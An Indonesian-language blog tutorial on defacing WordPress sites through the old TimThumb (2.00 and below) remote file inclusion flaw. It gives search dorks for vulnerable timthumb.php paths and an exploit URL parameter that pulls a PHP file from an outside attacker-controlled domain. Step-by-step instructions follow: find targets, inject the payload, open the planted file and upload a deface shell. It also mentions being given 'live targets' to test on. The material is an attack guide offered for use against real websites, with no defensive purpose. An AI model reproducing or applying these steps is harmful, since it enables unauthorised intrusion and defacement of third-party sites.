Deface Metode Timthumb Exploit Wordpress - Hallo semuanya kali ini saya akan berbagi tutorial yang memanfaat celah timthumb.php pada sebuah website, celah ini hanya berpengaruh untuk TimThumb version : 2.00 kebawah untuk keatasnya masih belum support. Oke mungkin metode ini cukup terkenal sudah lama sekali tapi kali ini mimin akan share kembali dan pastinya berserta exploit buatan speciment agar simple dan memudahkan buat kalian semuanya.
Bahan :
1) Dork :
- /wp-content/themes/twittplus/scripts/timthumb.php
- /wp-content/themes/eStore/timthumb.php
- /wp-content/themes/zcool-like/timthumb.php
- /wp-content/themes/xiando-one/thumb.php
- And all dork :
Klik Here2) Exploit : ?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php
3) Vuln : Timthumb version : 2.00 kebawah
Tutorial :
1) Lakukan dorking terlebih dahulu
2) Lalu pilih salah satu website tersebut dan jika cari file jika vuln maka akan seperti ini (disini intinya kalian harus mencari files yang bernama timthumb.php disebuah website itu)
3) Masukan exploit diatas diakhiran url timthumb.php (seperti gambar dibawah ini) dan berhasil akan seperti ini juga
4) Lihat gambar dibawah ini link file kalian sudah tertera jelas tinggal kalian buka saja : site.com:/link (setiap bug timthumb link filenya berbeda beda ya)
5) Jika link berhasil diakses maka hasilnya akan seperti ini
Nah mudah bukan selanjutnya kalian tinggal upload shell deface kalian lagi atau apa saja terserah kalian hehe, ohh iya thank untuk speciment karena sudah menyediakan kita link exploit untuk bug timthumb ini dan juga sudah memberikan saya live target untuk membuatkan kalian semua tutorial ini hehe.
